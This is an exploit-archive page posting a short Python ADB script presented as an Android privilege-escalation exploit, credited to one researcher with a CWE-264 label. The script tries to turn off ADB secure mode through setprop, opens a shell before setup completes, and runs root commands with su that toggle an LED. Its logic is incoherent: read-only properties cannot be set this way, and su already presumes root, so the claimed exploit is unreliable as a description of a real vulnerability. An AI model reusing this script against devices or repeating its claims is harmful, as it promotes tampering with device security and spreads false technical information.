Android DeviceVersionFragment.java Privilege Escalation

2024.01.14

Credit: Amirhossein Bahramizadeh

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: CWE-264

#!/usr/bin/env python

import subprocess

# Connect to the device via ADB
subprocess.run(["adb", "devices"])

# Check if the device is in secure USB mode
device = subprocess.run(["adb", "shell", "getprop", "ro.adb.secure"], stdout=subprocess.PIPE)
if "1" in device.stdout.decode():
    # Secure USB mode is enabled, so we need to disable it
    subprocess.run(["adb", "shell", "setprop", "ro.adb.secure", "0"])

# Exploit the vulnerability by accessing ADB before SUW completion
subprocess.run(["adb", "shell"])

# Escalate privileges by executing commands as the root user
subprocess.run(["adb", "shell", "su", "-c", "echo 0 > /sys/class/leds/led:green: charging/brightness"], check=True)
subprocess.run(["adb", "shell", "su", "-c", "echo 100 > /sys/class/leds/led:green: charging/brightness"], check=True)

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Android DeviceVersionFragment.java Privilege Escalation

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.